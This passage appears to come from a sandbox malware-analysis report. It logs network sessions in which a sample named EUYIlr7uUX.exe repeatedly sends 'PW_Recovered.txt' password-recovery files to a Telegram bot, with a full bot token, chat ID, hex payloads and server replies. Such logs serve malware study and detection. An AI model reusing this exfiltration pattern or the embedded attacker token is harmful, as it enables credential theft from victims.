2024-10-07 20:43:05 UTC	553	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 37 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6429,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333785,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	52189	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:19 UTC	370	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf9b222ab101d Host: api.telegram.org Content-Length: 560 Connection: Keep-Alive
2024-10-07 20:43:19 UTC	560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 62 32 32 32 61 62 31 30 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 2f 20 31 36 3a 34 31 3a 30 35 Data Ascii: --------------------------8dcf9b222ab101dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024 / 16:41:05
2024-10-07 20:43:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:19 GMT Content-Type: application/json Content-Length: 522 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:43:19 UTC	522	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 37 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6430,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333799,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	52191	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:21 UTC	370	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfbd4abc549f0 Host: api.telegram.org Content-Length: 560 Connection: Keep-Alive
2024-10-07 20:43:21 UTC	560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 62 64 34 61 62 63 35 34 39 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 2f 20 31 36 3a 34 31 3a 30 35 Data Ascii: --------------------------8dcfbd4abc549f0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024 / 16:41:05
2024-10-07 20:43:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:22 GMT Content-Type: application/json Content-Length: 522 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:43:22 UTC	522	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 38 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6431,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333802,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	52193	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:37 UTC	370	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfeb0e52279a5 Host: api.telegram.org Content-Length: 560 Connection: Keep-Alive
2024-10-07 20:43:37 UTC	560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 65 62 30 65 35 32 32 37 39 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 2f 20 31 36 3a 34 31 3a 30 35 Data Ascii: --------------------------8dcfeb0e52279a5Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024 / 16:41:05
2024-10-07 20:43:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:37 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:43:37 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 38 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6435,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333817,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	52195	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:43 UTC	370	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd01117777eae5 Host: api.telegram.org Content-Length: 560 Connection: Keep-Alive
2024-10-07 20:43:43 UTC	560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 31 31 37 37 37 37 65 61 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 2f 20 31 36 3a 34 31 3a 30 35 Data Ascii: --------------------------8dd01117777eae5Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024 / 16:41:05
2024-10-07 20:43:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:44 GMT Content-Type: application/json Content-Length: 522 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:43:44 UTC	522	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 38 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6438,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333823,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	52197	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:48 UTC	370	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd03f2ce7a2888 Host: api.telegram.org Content-Length: 560 Connection: Keep-Alive
2024-10-07 20:43:48 UTC	560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 33 66 32 63 65 37 61 32 38 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 2f 20 31 36 3a 34 31 3a 30 35 Data Ascii: --------------------------8dd03f2ce7a2888Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024 / 16:41:05
2024-10-07 20:43:49 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:48 GMT Content-Type: application/json Content-Length: 522 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:43:49 UTC	522	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 38 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6439,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333828,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	52199	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:53 UTC	370	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd062e2ba8c2f6 Host: api.telegram.org Content-Length: 560 Connection: Keep-Alive
2024-10-07 20:43:53 UTC	560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 32 65 32 62 61 38 63 32 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 2f 20 31 36 3a 34 31 3a 30 35 Data Ascii: --------------------------8dd062e2ba8c2f6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024 / 16:41:05
2024-10-07 20:43:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:53 GMT Content-Type: application/json Content-Length: 522 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:43:53 UTC	522	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 38 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6440,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333833,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	52201	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:44:15 UTC	370	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0c78d1de58e2 Host: api.telegram.org Content-Length: 560 Connection: Keep-Alive
2024-10-07 20:44:15 UTC	560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 37 38 64 31 64 65 35 38 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 2f 20 31 36 3a 34 31 3a 30 35 Data Ascii: --------------------------8dd0c78d1de58e2Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024 / 16:41:05
2024-10-07 20:44:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:44:15 GMT Content-Type: application/json Content-Length: 522 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:44:15 UTC	522	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 38 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6441,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333855,"document":{"fil

Target ID:	0
Start time:	16:41:04
Start date:	07/10/2024
